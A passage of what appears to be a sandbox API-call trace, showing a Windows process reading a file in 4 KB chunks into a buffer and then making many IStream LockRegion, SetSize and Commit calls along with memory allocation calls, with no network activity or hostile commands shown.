lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.088] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.088] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.088] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.088] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.088] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.088] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.088] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.088] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.088] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.088] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.088] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.088] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.088] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.088] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.089] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.089] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.089] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.089] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.089] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.089] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.089] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.089] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.089] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.089] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.089] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.089] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.089] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.089] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.089] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.089] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.089] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.089] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.089] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.089] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.089] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.089] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.089] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.089] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.089] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.089] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.089] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.089] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.089] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.089] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.089] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.089] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.089] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.089] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.089] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.090] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.090] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.090] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.090] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.090] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.090] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.090] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.090] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.090] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.090] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.090] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.090] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.090] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.090] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.090] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.090] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.090] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.090] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.090] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.090] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.090] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.090] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.090] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.090] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.090] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.090] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.090] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.090] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.090] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.090] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.090] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.090] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.090] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.090] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.090] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.090] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.090] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.091] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.091] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x0, lpOverlapped=0x0) returned 1 [0591.091] CloseHandle (hObject=0x660) returned 1 [0591.091] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.091] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.091] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.091] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.091] IStream:SetSize (This=0x63a0a8, libNewSize=0x52db70) returned 0x0 [0591.091] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.091] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.091] IStream:LockRegion (This=0x63a0a8, libOffset=0x10, cb=0x0, dwLockType=0x0) returned 0x0 [0591.091] IStream:SetSize (This=0x63a0a8, libNewSize=0x52db5a) returned 0x0 [0591.091] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.091] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.091] IStream:LockRegion (This=0x63a0a8, libOffset=0x12, cb=0x0, dwLockType=0x0) returned 0x0 [0591.091] IStream:SetSize (This=0x63a0a8, libNewSize=0x52db5b) returned 0x0 [0591.091] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.091] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.091] IStream:LockRegion (This=0x63a0a8, libOffset=0x13, cb=0x0, dwLockType=0x0) returned 0x0 [0591.091] IStream:SetSize (This=0x63a0a8, libNewSize=0x52db5b) returned 0x0 [0591.091] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.091] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x14, cb=0x0, dwLockType=0x0) returned 0x0 [0591.099] IStream:SetSize (This=0x63a0a8, libNewSize=0x52db5b) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x15, cb=0x0, dwLockType=0x0) returned 0x0 [0591.099] IStream:SetSize (This=0x63a0a8, libNewSize=0x52db5b) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x16, cb=0x0, dwLockType=0x0) returned 0x0 [0591.099] IStream:SetSize (This=0x63a0a8, libNewSize=0x52db5b) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x17, cb=0x0, dwLockType=0x0) returned 0x0 [0591.099] IStream:SetSize (This=0x63a0a8, libNewSize=0x52db5b) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x18, cb=0x0, dwLockType=0x0) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x20, cb=0x0, dwLockType=0x1) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x38, cb=0x0, dwLockType=0x0) returned 0x0 [0591.099] IStream:SetSize (This=0x63a0a8, libNewSize=0x52db58) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x3c, cb=0x0, dwLockType=0x0) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x28, cb=0x0, dwLockType=0x1) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x64, cb=0x0, dwLockType=0x1) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x64, cb=0x0, dwLockType=0x0) returned 0x0 [0591.099] IStream:SetSize (This=0x63a0a8, libNewSize=0x52daff) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x65, cb=0x0, dwLockType=0x0) returned 0x0 [0591.099] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dafe) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x67, cb=0x0, dwLockType=0x0) returned 0x0 [0591.099] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dafe) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.099] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.100] IStream:LockRegion (This=0x63a0a8, libOffset=0x69, cb=0x0, dwLockType=0x0) returned 0x0 [0591.100] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dafe) returned 0x0 [0591.100] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.100] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.100] IStream:LockRegion (This=0x63a0a8, libOffset=0x6b, cb=0x0, dwLockType=0x0) returned 0x0 [0591.100] IStream:SetSize (This=0x63a0a8, libNewSize=0x52daff) returned 0x0 [0591.100] LocalAlloc (uFlags=0x40, uBytes=0x10080) returned 0x2f0f770 [0591.100] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.100] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.100] IStream:LockRegion (This=0x63a0a8, libOffset=0x6c, cb=0x0, dwLockType=0x0) returned 0x0 [0591.100] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dafe) returned 0x0 [0591.100] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.100] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.100] IStream:LockRegion (This=0x63a0a8, libOffset=0x6e, cb=0x0, dwLockType=0x0) returned 0x0 [0591.100] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dafe) returned 0x0 [0591.100] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.100] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.100] IStream:LockRegion (This=0x63a0a8, libOffset=0x70, cb=0x0, dwLockType=0x0) returned 0x0 [0591.100] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dafe) returned 0x0 [0591.100] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.100] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.100] IStream:LockRegion (This=0x63a0a8, libOffset=0x72, cb=0x0, dwLockType=0x0) returned 0x0 [0591.100] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dafe) returned 0x0 [0591.100] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.100] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.100] IStream:LockRegion (This=0x63a0a8, libOffset=0x74, cb=0x0, dwLockType=0x0) returned 0x0 [0591.100] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dafe) returned 0x0 [0591.100] IStream:LockRegion (This=0x63a0a8, libOffset=0x7f2c, cb=0x0, dwLockType=0x0) returned 0x0 [0591.100] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.100] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.100] IStream:LockRegion (This=0x63a0a8, libOffset=0x7f2c, cb=0x0, dwLockType=0x0) returned 0x0 [0591.100] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dadf) returned 0x0 [0591.100] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.100] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.100] IStream:LockRegion (This=0x63a0a8, libOffset=0x7f2d, cb=0x0, dwLockType=0x0) returned 0x0 [0591.100] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dadf) returned 0x0 [0591.100] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.100] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.100] IStream:LockRegion (This=0x63a0a8, libOffset=0x7f2e, cb=0x0, dwLockType=0x0) returned 0x0 [0591.100] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dadf) returned 0x0 [0591.100] LocalAlloc (uFlags=0x40, uBytes=0x8080) returned 0x2f1f7f8 [0591.100] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52daf4 | out: ppstm=0x52daf4*=0x63a0f8) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0a8, libOffset=0x7f2f, cb=0x0, dwLockType=0x0) returned 0x0 [0591.101] IStream:SetSize (This=0x63a0a8, libNewSize=0x2f1f7f8) returned 0x0 [0591.101] IStream:Commit (This=0x63a0f8, grfCommitFlags=0x2f1f7f8) returned 0x0 [0591.101] LocalFree (hMem=0x2f1f7f8) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, 